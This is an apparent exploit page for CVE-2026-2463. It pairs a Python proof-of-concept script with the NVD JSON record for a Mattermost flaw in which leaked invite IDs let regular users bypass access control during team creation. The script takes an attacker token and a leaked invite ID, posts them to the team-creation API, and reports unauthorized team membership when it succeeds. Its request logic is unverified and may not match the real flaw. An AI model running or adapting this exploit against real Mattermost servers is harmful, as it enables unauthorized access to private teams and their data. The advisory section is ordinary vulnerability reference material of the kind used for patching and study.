CVE-2026-2463

# CVE-2026-2463 Mattermost Invite ID Access Control Bypass PoC # This PoC demonstrates the access control bypass in Mattermost team creation import requests import json TARGET_URL = "https://your-mattermost-server.com" ATTACKER_TOKEN = "your-authentication-token" LEAKED_INVITE_ID = "leaked-invite-id-from-target-team" def exploit_mattermost_cve_2026_2463(): """ Exploit for CVE-2026-2463: Mattermost invite ID access control bypass Allows regular users to register unauthorized accounts via leaked invite IDs """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Obtain or leak an invite ID from a team the user is not a member of # This can be done through various information disclosure methods invite_id = LEAKED_INVITE_ID # Step 2: Attempt to create a team with the leaked invite ID # The vulnerable endpoint does not properly validate permissions payload = { "invite_id": invite_id, "team_name": "unauthorized-team", "display_name": "Unauthorized Team", "type": "I" } endpoint = f"{TARGET_URL}/api/v4/teams" try: response = requests.post(endpoint, headers=headers, json=payload, verify=False) if response.status_code == 201: print("[+] SUCCESS: Unauthorized team membership created!") print(f"[+] Response: {response.json()}") return True else: print(f"[-] Failed: Status {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": exploit_mattermost_cve_2026_2463()

{"cve": {"id": "CVE-2026-2463", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:30.193", "lastModified": "2026-03-18T17:43:26.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to filter invite IDs based on user permissions, which allows regular users to bypass access control restrictions and register unauthorized accounts via leaked invite IDs during team creation.. Mattermost Advisory ID: MMSA-2025-00565"}, {"lang": "es", "value": "Las versiones de Mattermost 11.3.x &lt;= 11.3.0, 11.2.x &lt;= 11.2.2, 10.11.x &lt;= 10.11.10 no filtran los ID de invitación basándose en los permisos de usuario, lo que permite a los usuarios regulares eludir las restricciones de control de acceso y registrar cuentas no autorizadas a través de ID de invitación filtrados durante la creación de equipos. ID de Aviso de Mattermost: MMSA-2025-00565"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.1", "matchCriteriaId": "945A6E29-209F-4992-8692-BEF63DCB6B98"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}